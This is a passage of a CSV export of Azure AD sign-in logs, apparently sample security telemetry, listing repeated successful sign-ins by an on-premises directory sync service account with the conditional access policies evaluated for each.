'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 01:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",46ab66bf-13d5-46c8-a514-03b712000700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,46ab66bf-13d5-46c8-a514-03b712000700,SigninLogs,Sucess,36.6404686,-78.26995087
+853,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:07.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c34ef96f-2c46-44a9-bfd3-3268deaa6e7c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cfab9824-c87d-41e8-8623-1f6d6f8b0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cfab9824-c87d-41e8-8623-1f6d6f8b0900,SigninLogs,Sucess,36.6404686,-78.26995087
+854,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e2c109c-b4b8-4d9a-ae99-156a252f79d7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 22:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",93c39a76-bdc9-4bb7-bb78-632009440300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,93c39a76-bdc9-4bb7-bb78-632009440300,SigninLogs,Sucess,36.6404686,-78.26995087
+855,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:00.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e4eff33f-7e0e-4669-b86f-19e7be6fb5f7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",80d584c4-dd35-4dcb-882c-05932ccc0800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,80d584c4-dd35-4dcb-882c-05932ccc0800,SigninLogs,Sucess,36.6404686,-78.26995087
+856,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:00.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99c7ba19-aa66-4d83-97fa-4d9ba81876d1,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 02:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",5fa972fe-7fa8-4b4b-bbdd-e602e74e0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5fa972fe-7fa8-4b4b-bbdd-e602e74e0900,SigninLogs,Sucess,36.6404686,-78.26995087
+857,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f9ecdb88-7160-4501-905d-4a4ca9eeffa0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4130ca1d-0d16-4aad-a433-4063d5830a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4130ca1d-0d16-4aad-a433-4063d5830a00,SigninLogs,Sucess,36.6404686,-78.26995087
+858,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:07.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c34ef96f-2c46-44a9-bfd3-3268deaa6e7c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 04:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",cfab9824-c87d-41e8-8623-1f6d6f8b0900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,cfab9824-c87d-41e8-8623-1f6d6f8b0900,SigninLogs,Sucess,36.6404686,-78.26995087
+859,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:06.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5b30c317-e6f8-4cfe-9342-205c2e1b1d36,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 03:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c27bb27f-6b5f-4aa7-85e4-b0d8e4f60800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c27bb27f-6b5f-4aa7-85e4-b0d8e4f60800,SigninLogs,Sucess,36.6404686,-78.26995087
